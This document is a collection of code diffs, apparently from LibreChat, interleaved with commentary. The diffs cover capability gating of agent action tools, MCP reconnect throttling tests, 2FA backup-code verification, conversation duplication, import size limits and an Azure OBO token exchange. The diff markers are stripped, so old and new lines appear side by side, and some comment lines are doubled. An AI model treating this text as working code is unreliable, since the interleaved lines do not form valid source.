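// also short-circuits user B's lookup, preventing cross-user reconnect storms.
const NEGATIVE_TTL_MS = 10_000;
const negativeCache = new Map(); // toolKey -> expiry timestamp (ms)

function markToolMissing(toolKey, now = Date.now()) {
  negativeCache.set(toolKey, now + NEGATIVE_TTL_MS);
}

function isToolKnownMissing(toolKey, now = Date.now()) {
  const expiry = negativeCache.get(toolKey);
  if (expiry === undefined) return false;
  if (now > expiry) {
    negativeCache.delete(toolKey); // stale entry: allow a fresh reconnect
    return false;
  }
  return true;
}
```

Any user requesting the same `toolKey` inside the window gets a cache hit, which is exactly what the `toHaveBeenCalledTimes(1)` assertions verify.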
describe('createMCPTools throttle handling', () => {
it('should return empty array with debug log when reconnect is throttled', async () => {
const mockUser = { id: 'throttle-tools-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: real reconnect
mockReinitMCPServer.mockResolvedValueOnce({
tools: [{ name: 'tool1' }],
availableTools: {
[`tool1${D}throttle-tools-server`]: {
function: { description: 'Tool 1', parameters: {} },
},
},
});
await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
// Second call within 10s — throttled
const result = await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
expect(result).toEqual([]);
// reinitMCPServer called only once — second was throttled
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// Should log at debug level (not warn) for throttled case
expect(logger.debug).toHaveBeenCalledWith(expect.stringContaining('Reconnect throttled'));
});
});
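The throttle behavior asserted above can be sketched as a per-(user, server) window: the first reconnect in the window proceeds, later attempts are suppressed. This is a hypothetical illustration (names and the 10-second window are assumptions from the test comments, not the actual implementation):

```javascript
// Hypothetical per-(user, server) reconnect throttle with a 10s window.
// The first call in a window proceeds and records its timestamp;
// subsequent calls inside the window are suppressed.
const THROTTLE_MS = 10_000;
const lastReconnect = new Map(); // `${userId}:${serverName}` -> timestamp (ms)

function shouldReconnect(userId, serverName, now = Date.now()) {
  const key = `${userId}:${serverName}`;
  const last = lastReconnect.get(key);
  if (last !== undefined && now - last < THROTTLE_MS) {
    return false; // throttled: a reconnect already ran recently for this pair
  }
  lastReconnect.set(key, now);
  return true;
}
```

Note the key includes the user ID, which is why the tests above need the separate toolKey-scoped negative cache to stop a second user's first request from reconnecting.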
describe('User parameter integrity', () => {
it('should preserve user object properties through the call chain', async () => {
const complexUser = {


@@ -64,6 +64,26 @@ const { redactMessage } = require('~/config/parsers');
const { findPluginAuthsByKeys } = require('~/models');
const { getFlowStateManager } = require('~/config');
const { getLogStores } = require('~/cache');
/**
* Resolves the set of enabled agent capabilities from endpoints config,
* falling back to app-level or default capabilities for ephemeral agents.
* @param {ServerRequest} req
* @param {Object} appConfig
* @param {string} agentId
* @returns {Promise<Set<string>>}
*/
async function resolveAgentCapabilities(req, appConfig, agentId) {
const endpointsConfig = await getEndpointsConfig(req);
let capabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
if (capabilities.size === 0 && isEphemeralAgentId(agentId)) {
capabilities = new Set(
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
);
}
return capabilities;
}
/**
* Processes the required actions by calling the appropriate tools and returning the outputs.
* @param {OpenAIClient} client - OpenAI or StreamRunManager Client.
@@ -445,17 +465,11 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
}
const appConfig = req.config;
const endpointsConfig = await getEndpointsConfig(req);
let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) {
enabledCapabilities = new Set(
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
);
}
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id);
const checkCapability = (capability) => enabledCapabilities.has(capability);
const areToolsEnabled = checkCapability(AgentCapabilities.tools);
const actionsEnabled = checkCapability(AgentCapabilities.actions);
const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools);
const filteredTools = agent.tools?.filter((tool) => {
@@ -468,7 +482,10 @@
if (tool === Tools.web_search) {
return checkCapability(AgentCapabilities.web_search);
}
if (!areToolsEnabled && !tool.includes(actionDelimiter)) {
if (tool.includes(actionDelimiter)) {
return actionsEnabled;
}
if (!areToolsEnabled) {
return false;
}
return true;
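The filter introduced in this hunk gates action tools (names containing the action delimiter) solely on the actions capability, and everything else on the tools capability. A standalone sketch of that predicate (the `'_action_'` delimiter is a stand-in; the real one comes from librechat-data-provider's `actionDelimiter`):

```javascript
// Sketch of the capability-gated tool filter. '_action_' is a stand-in
// for librechat-data-provider's actual actionDelimiter constant.
const actionDelimiter = '_action_';

function filterAgentTools(tools, { areToolsEnabled, actionsEnabled }) {
  return (tools ?? []).filter((tool) => {
    if (tool.includes(actionDelimiter)) {
      return actionsEnabled; // action tools gated only by the actions capability
    }
    return areToolsEnabled; // regular tools gated by the tools capability
  });
}
```

The key behavioral change versus the removed condition is that an action tool now survives even when `tools` is disabled, as long as `actions` is enabled, and vice versa.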
@@ -765,6 +782,7 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
toolContextMap,
toolDefinitions,
hasDeferredTools,
actionsEnabled,
};
}
@@ -808,14 +826,7 @@
}
const appConfig = req.config;
const endpointsConfig = await getEndpointsConfig(req);
let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
/** Edge case: use defined/fallback capabilities when the "agents" endpoint is not enabled */
if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) {
enabledCapabilities = new Set(
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
);
}
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id);
const checkCapability = (capability) => {
const enabled = enabledCapabilities.has(capability);
if (!enabled) {
@@ -832,6 +843,7 @@
return enabled;
};
const areToolsEnabled = checkCapability(AgentCapabilities.tools);
const actionsEnabled = checkCapability(AgentCapabilities.actions);
let includesWebSearch = false;
const _agentTools = agent.tools?.filter((tool) => {
@@ -842,7 +854,9 @@
} else if (tool === Tools.web_search) {
includesWebSearch = checkCapability(AgentCapabilities.web_search);
return includesWebSearch;
} else if (!areToolsEnabled && !tool.includes(actionDelimiter)) {
} else if (tool.includes(actionDelimiter)) {
return actionsEnabled;
} else if (!areToolsEnabled) {
return false;
}
return true;
@@ -947,13 +961,15 @@
agentTools.push(...additionalTools);
if (!checkCapability(AgentCapabilities.actions)) {
const hasActionTools = _agentTools.some((t) => t.includes(actionDelimiter));
if (!hasActionTools) {
return {
toolRegistry,
userMCPAuthMap,
toolContextMap,
toolDefinitions,
hasDeferredTools,
actionsEnabled,
tools: agentTools,
};
}
@@ -969,6 +985,7 @@
toolContextMap,
toolDefinitions,
hasDeferredTools,
actionsEnabled,
tools: agentTools,
};
}
@@ -1101,6 +1118,7 @@
userMCPAuthMap,
toolDefinitions,
hasDeferredTools,
actionsEnabled,
tools: agentTools,
};
}
@@ -1118,9 +1136,11 @@
* @param {AbortSignal} [params.signal] - Abort signal
* @param {Object} params.agent - The agent object
* @param {string[]} params.toolNames - Names of tools to load
* @param {Map} [params.toolRegistry] - Tool registry
* @param {Record<string, Record<string, string>>} [params.userMCPAuthMap] - User MCP auth map
* @param {Object} [params.tool_resources] - Tool resources
* @param {string|null} [params.streamId] - Stream ID for web search callbacks
* @param {boolean} [params.actionsEnabled] - Whether the actions capability is enabled
* @returns {Promise<{ loadedTools: Array, configurable: Object }>}
*/
async function loadToolsForExecution({
@@ -1133,11 +1153,17 @@
userMCPAuthMap,
tool_resources,
streamId = null,
actionsEnabled,
}) {
const appConfig = req.config;
const allLoadedTools = [];
const configurable = { userMCPAuthMap };
if (actionsEnabled === undefined) {
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent?.id);
actionsEnabled = enabledCapabilities.has(AgentCapabilities.actions);
}
const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH);
const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING);
@@ -1194,7 +1220,6 @@
const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter));
const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter));
/** @type {Record<string, unknown>} */
if (regularToolNames.length > 0) {
const includesWebSearch = regularToolNames.includes(Tools.web_search);
const webSearchCallbacks = includesWebSearch ? createOnSearchResults(res, streamId) : undefined;
@@ -1225,7 +1250,7 @@
}
}
if (actionToolNames.length > 0 && agent) {
if (actionToolNames.length > 0 && agent && actionsEnabled) {
const actionTools = await loadActionToolsForExecution({
req,
res,
@@ -1235,6 +1260,11 @@
actionToolNames,
});
allLoadedTools.push(...actionTools);
} else if (actionToolNames.length > 0 && agent && !actionsEnabled) {
logger.warn(
`[loadToolsForExecution] Capability "${AgentCapabilities.actions}" disabled. ` +
`Skipping action tool execution. User: ${req.user.id} | Agent: ${agent.id} | Tools: ${actionToolNames.join(', ')}`,
);
}
if (isPTC && allLoadedTools.length > 0) {
@@ -1395,4 +1425,5 @@ module.exports = {
loadAgentTools,
loadToolsForExecution,
processRequiredActions,
resolveAgentCapabilities,
};
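The execution-time gating in this file splits tool names by the action delimiter and only loads the action group when the capability is enabled, logging a warning otherwise. A standalone sketch of that split (the delimiter is a stand-in; names are illustrative):

```javascript
// Sketch of the execution-time partition: action tools are loaded only when
// the actions capability is enabled; otherwise they are skipped and the
// caller can log which tools were dropped.
const actionDelimiter = '_action_'; // stand-in for the real delimiter constant

function partitionToolNames(toolNames, actionsEnabled) {
  const actionTools = toolNames.filter((n) => n.includes(actionDelimiter));
  const regularToolNames = toolNames.filter((n) => !n.includes(actionDelimiter));
  return {
    regularToolNames,
    // Emptied when disabled so no action set is ever fetched for them.
    actionToolNames: actionsEnabled ? actionTools : [],
    skipped: actionsEnabled ? [] : actionTools,
  };
}
```

This mirrors the `actionToolNames` / `regularToolNames` filters in the hunk above, with the `skipped` list feeding the warning path.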


@@ -1,19 +1,304 @@
const {
Tools,
Constants,
EModelEndpoint,
actionDelimiter,
AgentCapabilities,
defaultAgentCapabilities,
} = require('librechat-data-provider');
/**
* Tests for ToolService capability checking logic.
* The actual loadAgentTools function has many dependencies, so we test
* the capability checking logic in isolation.
*/
describe('ToolService - Capability Checking', () => {
const mockGetEndpointsConfig = jest.fn();
const mockGetMCPServerTools = jest.fn();
const mockGetCachedTools = jest.fn();
jest.mock('~/server/services/Config', () => ({
getEndpointsConfig: (...args) => mockGetEndpointsConfig(...args),
getMCPServerTools: (...args) => mockGetMCPServerTools(...args),
getCachedTools: (...args) => mockGetCachedTools(...args),
}));
const mockLoadToolDefinitions = jest.fn();
const mockGetUserMCPAuthMap = jest.fn();
jest.mock('@librechat/api', () => ({
...jest.requireActual('@librechat/api'),
loadToolDefinitions: (...args) => mockLoadToolDefinitions(...args),
getUserMCPAuthMap: (...args) => mockGetUserMCPAuthMap(...args),
}));
const mockLoadToolsUtil = jest.fn();
jest.mock('~/app/clients/tools/util', () => ({
loadTools: (...args) => mockLoadToolsUtil(...args),
}));
const mockLoadActionSets = jest.fn();
jest.mock('~/server/services/Tools/credentials', () => ({
loadAuthValues: jest.fn().mockResolvedValue({}),
}));
jest.mock('~/server/services/Tools/search', () => ({
createOnSearchResults: jest.fn(),
}));
jest.mock('~/server/services/Tools/mcp', () => ({
reinitMCPServer: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
processFileURL: jest.fn(),
uploadImageBuffer: jest.fn(),
}));
jest.mock('~/app/clients/tools/util/fileSearch', () => ({
primeFiles: jest.fn().mockResolvedValue({}),
}));
jest.mock('~/server/services/Files/Code/process', () => ({
primeFiles: jest.fn().mockResolvedValue({}),
}));
jest.mock('../ActionService', () => ({
loadActionSets: (...args) => mockLoadActionSets(...args),
decryptMetadata: jest.fn(),
createActionTool: jest.fn(),
domainParser: jest.fn(),
}));
jest.mock('~/server/services/Threads', () => ({
recordUsage: jest.fn(),
}));
jest.mock('~/models', () => ({
findPluginAuthsByKeys: jest.fn(),
}));
jest.mock('~/config', () => ({
getFlowStateManager: jest.fn(() => ({})),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(() => ({})),
}));
const {
loadAgentTools,
loadToolsForExecution,
resolveAgentCapabilities,
} = require('../ToolService');
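The mock setup above routes each mocked module export through an outer `jest.fn()` reference so individual tests can reprogram behavior with `mockResolvedValue` and friends. The same indirection in plain JavaScript, as a minimal illustration (not Jest-specific; names are hypothetical):

```javascript
// The jest.mock factories above delegate to outer mock-function references.
// The core idea: the exported wrapper keeps a stable identity while its
// behavior is swapped per test. Plain-JS equivalent of that indirection:
let currentImpl = () => ({}); // default behavior

const configModule = {
  // Stable export; always delegates to whatever currentImpl is right now.
  getEndpointsConfig: (...args) => currentImpl(...args),
};

function setEndpointsConfigImpl(fn) {
  currentImpl = fn; // what mockResolvedValue/mockReturnValue do under the hood
}
```

In Jest this indirection also sidesteps the rule that `jest.mock` factories may only reference out-of-scope variables whose names begin with `mock`.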
function createMockReq(capabilities) {
return {
user: { id: 'user_123' },
config: {
endpoints: {
[EModelEndpoint.agents]: {
capabilities,
},
},
},
};
}
function createEndpointsConfig(capabilities) {
return {
[EModelEndpoint.agents]: { capabilities },
};
}
describe('ToolService - Action Capability Gating', () => {
beforeEach(() => {
jest.clearAllMocks();
mockLoadToolDefinitions.mockResolvedValue({
toolDefinitions: [],
toolRegistry: new Map(),
hasDeferredTools: false,
});
mockLoadToolsUtil.mockResolvedValue({ loadedTools: [], toolContextMap: {} });
mockLoadActionSets.mockResolvedValue([]);
});
describe('resolveAgentCapabilities', () => {
it('should return capabilities from endpoints config', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
const result = await resolveAgentCapabilities(req, req.config, 'agent_123');
expect(result).toBeInstanceOf(Set);
expect(result.has(AgentCapabilities.tools)).toBe(true);
expect(result.has(AgentCapabilities.actions)).toBe(true);
expect(result.has(AgentCapabilities.web_search)).toBe(false);
});
it('should fall back to default capabilities for ephemeral agents with empty config', async () => {
const req = createMockReq(defaultAgentCapabilities);
mockGetEndpointsConfig.mockResolvedValue({});
const result = await resolveAgentCapabilities(req, req.config, Constants.EPHEMERAL_AGENT_ID);
for (const cap of defaultAgentCapabilities) {
expect(result.has(cap)).toBe(true);
}
});
it('should return empty set when no capabilities and not ephemeral', async () => {
const req = createMockReq([]);
mockGetEndpointsConfig.mockResolvedValue({});
const result = await resolveAgentCapabilities(req, req.config, 'agent_123');
expect(result.size).toBe(0);
});
});
describe('loadAgentTools (definitionsOnly=true) — action tool filtering', () => {
const actionToolName = `get_weather${actionDelimiter}api_example_com`;
const regularTool = 'calculator';
it('should exclude action tools from definitions when actions capability is disabled', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: true,
});
expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1);
const [callArgs] = mockLoadToolDefinitions.mock.calls[0];
expect(callArgs.tools).toContain(regularTool);
expect(callArgs.tools).not.toContain(actionToolName);
});
it('should include action tools in definitions when actions capability is enabled', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: true,
});
expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1);
const [callArgs] = mockLoadToolDefinitions.mock.calls[0];
expect(callArgs.tools).toContain(regularTool);
expect(callArgs.tools).toContain(actionToolName);
});
it('should return actionsEnabled in the result', async () => {
const capabilities = [AgentCapabilities.tools];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
const result = await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool] },
definitionsOnly: true,
});
expect(result.actionsEnabled).toBe(false);
});
});
describe('loadAgentTools (definitionsOnly=false) — action tool filtering', () => {
const actionToolName = `get_weather${actionDelimiter}api_example_com`;
const regularTool = 'calculator';
it('should not load action sets when actions capability is disabled', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: false,
});
expect(mockLoadActionSets).not.toHaveBeenCalled();
});
it('should load action sets when actions capability is enabled and action tools present', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: false,
});
expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' });
});
});
describe('loadToolsForExecution — action tool gating', () => {
const actionToolName = `get_weather${actionDelimiter}api_example_com`;
const regularTool = Tools.web_search;
it('should skip action tool loading when actionsEnabled=false', async () => {
const req = createMockReq([]);
req.config = {};
const result = await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [regularTool, actionToolName],
actionsEnabled: false,
});
expect(mockLoadActionSets).not.toHaveBeenCalled();
expect(result.loadedTools).toBeDefined();
});
it('should load action tools when actionsEnabled=true', async () => {
const req = createMockReq([AgentCapabilities.actions]);
req.config = {};
await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [actionToolName],
actionsEnabled: true,
});
expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' });
});
it('should resolve actionsEnabled from capabilities when not explicitly provided', async () => {
const capabilities = [AgentCapabilities.tools];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [actionToolName],
});
expect(mockGetEndpointsConfig).toHaveBeenCalled();
expect(mockLoadActionSets).not.toHaveBeenCalled();
});
it('should not call loadActionSets when there are no action tools', async () => {
const req = createMockReq([AgentCapabilities.actions]);
req.config = {};
await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [regularTool],
actionsEnabled: true,
});
expect(mockLoadActionSets).not.toHaveBeenCalled();
});
});
describe('checkCapability logic', () => {
/**
* Simulates the checkCapability function from loadAgentTools
*/
const createCheckCapability = (enabledCapabilities, logger = { warn: jest.fn() }) => {
return (capability) => {
const enabled = enabledCapabilities.has(capability);
@@ -124,10 +409,6 @@ describe('ToolService - Capability Checking', () => {
});
describe('userMCPAuthMap gating', () => {
/**
* Simulates the guard condition used in both loadToolDefinitionsWrapper
* and loadAgentTools to decide whether getUserMCPAuthMap should be called.
*/
const shouldFetchMCPAuth = (tools) =>
tools?.some((t) => t.includes(Constants.mcp_delimiter)) ?? false;
@@ -178,20 +459,17 @@ describe('ToolService - Capability Checking', () => {
return (capability) => enabledCapabilities.has(capability);
};
// When deferred_tools is in capabilities
const withDeferred = new Set([AgentCapabilities.deferred_tools, AgentCapabilities.tools]);
const checkWithDeferred = createCheckCapability(withDeferred);
expect(checkWithDeferred(AgentCapabilities.deferred_tools)).toBe(true);
// When deferred_tools is NOT in capabilities
const withoutDeferred = new Set([AgentCapabilities.tools, AgentCapabilities.actions]);
const checkWithoutDeferred = createCheckCapability(withoutDeferred);
expect(checkWithoutDeferred(AgentCapabilities.deferred_tools)).toBe(false);
});
it('should use defaultAgentCapabilities when no capabilities configured', () => {
// Simulates the fallback behavior in loadAgentTools
const endpointsConfig = {}; // No capabilities configured
const enabledCapabilities = new Set(
endpointsConfig?.capabilities ?? defaultAgentCapabilities,
);


@@ -153,9 +153,11 @@ const generateBackupCodes = async (count = 10) => {
* @param {Object} params
* @param {Object} params.user
* @param {string} params.backupCode
* @param {boolean} [params.persist=true] - Whether to persist the used-mark to the database.
* Pass `false` when the caller will immediately overwrite `backupCodes` (e.g. re-enrollment).
* @returns {Promise<boolean>}
*/
const verifyBackupCode = async ({ user, backupCode, persist = true }) => {
if (!backupCode || !user || !Array.isArray(user.backupCodes)) {
return false;
}
@@ -165,17 +167,50 @@
(codeObj) => codeObj.codeHash === hashedInput && !codeObj.used,
);
if (!matchingCode) {
return false;
}
if (persist) {
const updatedBackupCodes = user.backupCodes.map((codeObj) =>
codeObj.codeHash === hashedInput && !codeObj.used
? { ...codeObj, used: true, usedAt: new Date() }
: codeObj,
);
await updateUser(user._id, { backupCodes: updatedBackupCodes });
}
return true;
};
/**
* Verifies a user's identity via TOTP token or backup code.
* @param {Object} params
* @param {Object} params.user - The user document (must include totpSecret and backupCodes).
* @param {string} [params.token] - A 6-digit TOTP token.
* @param {string} [params.backupCode] - An 8-character backup code.
* @param {boolean} [params.persistBackupUse=true] - Whether to mark the backup code as used in the DB.
* @returns {Promise<{ verified: boolean, status?: number, message?: string }>}
*/
const verifyOTPOrBackupCode = async ({ user, token, backupCode, persistBackupUse = true }) => {
if (!token && !backupCode) {
return { verified: false, status: 400 };
}
if (token) {
const secret = await getTOTPSecret(user.totpSecret);
if (!secret) {
return { verified: false, status: 400, message: '2FA secret is missing or corrupted' };
}
const ok = await verifyTOTP(secret, token);
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
}
const ok = await verifyBackupCode({ user, backupCode, persist: persistBackupUse });
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
};
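The dispatch above maps missing credentials to 400 and invalid ones to 401, regardless of whether a TOTP token or a backup code was supplied. That status contract can be captured in a tiny standalone sketch (a simplification; the real function also fetches and verifies the actual secret):

```javascript
// Standalone sketch of verifyOTPOrBackupCode's status contract:
// no credential supplied -> 400; invalid credential -> 401; valid -> verified.
function mapVerification({ hasToken, hasBackupCode, credentialValid }) {
  if (!hasToken && !hasBackupCode) {
    return { verified: false, status: 400 };
  }
  return credentialValid
    ? { verified: true }
    : { verified: false, status: 401, message: 'Invalid token or backup code' };
}
```

Keeping the 401 message identical for both credential types avoids leaking which factor failed.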
/**
@@ -213,11 +248,12 @@ const generate2FATempToken = (userId) => {
};
module.exports = {
verifyOTPOrBackupCode,
generate2FATempToken,
generateBackupCodes,
generateTOTPSecret,
verifyBackupCode,
getTOTPSecret,
generateTOTP,
verifyTOTP,
};


@@ -358,16 +358,15 @@ function splitAtTargetLevel(messages, targetMessageId) {
* @param {object} params - The parameters for duplicating the conversation.
* @param {string} params.userId - The ID of the user duplicating the conversation.
* @param {string} params.conversationId - The ID of the conversation to duplicate.
* @param {string} [params.title] - Optional title override for the duplicate.
* @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages.
*/
async function duplicateConversation({ userId, conversationId, title }) {
const originalConvo = await getConvo(userId, conversationId);
if (!originalConvo) {
throw new Error('Conversation not found');
}
const originalMessages = await getMessages({
user: userId,
conversationId,
@@ -383,14 +382,11 @@ async function duplicateConversation({ userId, conversationId, title }) {
cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder);
const duplicateTitle = title || originalConvo.title;
const result = importBatchBuilder.finishConversation(duplicateTitle, new Date(), originalConvo);
await importBatchBuilder.saveBatch();
logger.debug(
`user: ${userId} | New conversation "${duplicateTitle}" duplicated from conversation ID ${conversationId}`,
);
const conversation = await getConvo(userId, result.conversation.conversationId);
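The title fallback added in this hunk is worth noting: it uses `||`, not `??`, so an empty-string override also falls back to the original title. Isolated for illustration:

```javascript
// Sketch of the title-override fallback above: an explicit title wins,
// otherwise the original conversation's title is reused. Because `||` is
// used (not `??`), an empty-string override also falls back.
function resolveDuplicateTitle(titleOverride, originalTitle) {
  return titleOverride || originalTitle;
}
```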


@@ -1,7 +1,10 @@
const fs = require('fs').promises;
const { resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas');
const { getImporter } = require('./importers');
const maxFileSize = resolveImportMaxFileSize();
/**
* Job definition for importing a conversation.
* @param {{ filepath, requestUserId }} job - The job object.
@@ -11,11 +14,10 @@ const importConversations = async (job) => {
try {
logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`);
const fileInfo = await fs.stat(filepath);
if (fileInfo.size > maxFileSize) {
throw new Error(
`File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${maxFileSize} bytes.`,
);
}
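The change above replaces a raw (string-typed) env-var comparison with a resolved numeric limit. The actual `resolveImportMaxFileSize` lives in `@librechat/api` and its exact default is not shown here; a hypothetical sketch of what such a resolver typically does (the 50 MiB fallback is an assumption for illustration only):

```javascript
// Hypothetical sketch of env-based size resolution. The real
// resolveImportMaxFileSize is in @librechat/api and its default may differ.
function resolveMaxFileSizeSketch(env, fallbackBytes = 50 * 1024 * 1024) {
  const raw = Number(env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES);
  // Reject NaN, Infinity, zero, and negatives; otherwise honor the override.
  return Number.isFinite(raw) && raw > 0 ? raw : fallbackBytes;
}
```

Resolving once at module load (as the diff does) also avoids re-parsing the env var on every import job.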


@@ -315,24 +315,85 @@ function convertToUsername(input, defaultValue = '') {
return defaultValue;
}
/**
* Exchange the access token for a Graph-scoped token using the On-Behalf-Of (OBO) flow.
*
* The original access token has the app's own audience (api://<client-id>), which Microsoft Graph
* rejects. This exchange produces a token with audience https://graph.microsoft.com and the
* minimum delegated scope (User.Read) required by /me/getMemberObjects.
*
* Uses a dedicated cache key (`${sub}:overage`) to avoid collisions with other OBO exchanges
* in the codebase (userinfo, Graph principal search).
*
* @param {string} accessToken - The original access token from the OpenID tokenset
* @param {string} sub - The subject identifier for cache keying
* @returns {Promise<string>} A Graph-scoped access token
* @see https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-on-behalf-of-flow
*/
async function exchangeTokenForOverage(accessToken, sub) {
if (!openidConfig) {
throw new Error('[openidStrategy] OpenID config not initialized; cannot exchange OBO token');
}
const tokensCache = getLogStores(CacheKeys.OPENID_EXCHANGED_TOKENS);
const cacheKey = `${sub}:overage`;
const cached = await tokensCache.get(cacheKey);
if (cached?.access_token) {
logger.debug('[openidStrategy] Using cached Graph token for overage resolution');
return cached.access_token;
}
const grantResponse = await client.genericGrantRequest(
openidConfig,
'urn:ietf:params:oauth:grant-type:jwt-bearer',
{
scope: 'https://graph.microsoft.com/User.Read',
assertion: accessToken,
requested_token_use: 'on_behalf_of',
},
);
if (!grantResponse.access_token) {
throw new Error(
'[openidStrategy] OBO exchange succeeded but returned no access_token; cannot call Graph API',
);
}
const ttlMs =
Number.isFinite(grantResponse.expires_in) && grantResponse.expires_in > 0
? grantResponse.expires_in * 1000
: 3600 * 1000;
await tokensCache.set(cacheKey, { access_token: grantResponse.access_token }, ttlMs);
return grantResponse.access_token;
}
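The caching step at the end of `exchangeTokenForOverage` trusts `expires_in` only when it is a finite positive number of seconds, falling back to one hour. That guard can be isolated as a small helper (a sketch, not code from the diff; the function name is made up):

```javascript
// Sketch of the TTL fallback used when caching the exchanged Graph token:
// use expires_in only when it is a finite positive number of seconds,
// otherwise cache for one hour.
function resolveCacheTtlMs(expiresIn, fallbackSeconds = 3600) {
  return Number.isFinite(expiresIn) && expiresIn > 0
    ? expiresIn * 1000
    : fallbackSeconds * 1000;
}
```

This keeps a malformed or missing `expires_in` from producing a zero or negative TTL, which some cache backends treat as "never expire".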
/** /**
* Resolve Azure AD groups when group overage is in effect (groups moved to _claim_names/_claim_sources). * Resolve Azure AD groups when group overage is in effect (groups moved to _claim_names/_claim_sources).
* *
* NOTE: Microsoft recommends treating _claim_names/_claim_sources as a signal only and using Microsoft Graph * NOTE: Microsoft recommends treating _claim_names/_claim_sources as a signal only and using Microsoft Graph
* to resolve group membership instead of calling the endpoint in _claim_sources directly. * to resolve group membership instead of calling the endpoint in _claim_sources directly.
* *
* @param {string} accessToken - Access token with Microsoft Graph permissions * Before calling Graph, the access token is exchanged via the OBO flow to obtain a token with the
* correct audience (https://graph.microsoft.com) and User.Read scope.
*
* @param {string} accessToken - Access token from the OpenID tokenset (app audience)
* @param {string} sub - The subject identifier of the user (for OBO exchange and cache keying)
* @returns {Promise<string[] | null>} Resolved group IDs or null on failure * @returns {Promise<string[] | null>} Resolved group IDs or null on failure
* @see https://learn.microsoft.com/en-us/entra/identity-platform/access-token-claims-reference#groups-overage-claim * @see https://learn.microsoft.com/en-us/entra/identity-platform/access-token-claims-reference#groups-overage-claim
* @see https://learn.microsoft.com/en-us/graph/api/directoryobject-getmemberobjects * @see https://learn.microsoft.com/en-us/graph/api/directoryobject-getmemberobjects
*/ */
async function resolveGroupsFromOverage(accessToken) { async function resolveGroupsFromOverage(accessToken, sub) {
try { try {
if (!accessToken) { if (!accessToken) {
logger.error('[openidStrategy] Access token missing; cannot resolve group overage'); logger.error('[openidStrategy] Access token missing; cannot resolve group overage');
return null; return null;
} }
const graphToken = await exchangeTokenForOverage(accessToken, sub);
// Use /me/getMemberObjects so least-privileged delegated permission User.Read is sufficient // Use /me/getMemberObjects so least-privileged delegated permission User.Read is sufficient
// when resolving the signed-in user's group membership. // when resolving the signed-in user's group membership.
const url = 'https://graph.microsoft.com/v1.0/me/getMemberObjects'; const url = 'https://graph.microsoft.com/v1.0/me/getMemberObjects';
